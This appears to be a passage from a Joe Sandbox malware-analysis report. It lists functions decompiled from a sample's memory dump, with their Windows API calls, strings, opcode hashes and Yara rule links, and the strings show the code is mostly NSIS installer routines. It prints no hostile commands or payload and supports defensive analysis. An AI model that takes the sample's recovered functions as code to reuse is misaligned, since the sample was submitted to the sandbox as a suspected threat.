Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

@, xrefs: 00404B90
M, xrefs: 00404B43
N, xrefs: 00404C06
, xrefs: 00404F39

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

@%F, xrefs: 00404674
@rD, xrefs: 00404610
A, xrefs: 00404636
82D, xrefs: 004046DB

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

name, xrefs: 00406FBF
GetTTFNameString, xrefs: 00406F07
%s: failed opening file "%s", xrefs: 00406F0C

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
\*.*, xrefs: 00406D03
Delete: DeleteFile("%s"), xrefs: 00406DBC

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

@%F, xrefs: 0040682C
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
@%F, xrefs: 00406A53

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.1754636434.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1754585455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754662845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754746691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1754846374.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nj230708full.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
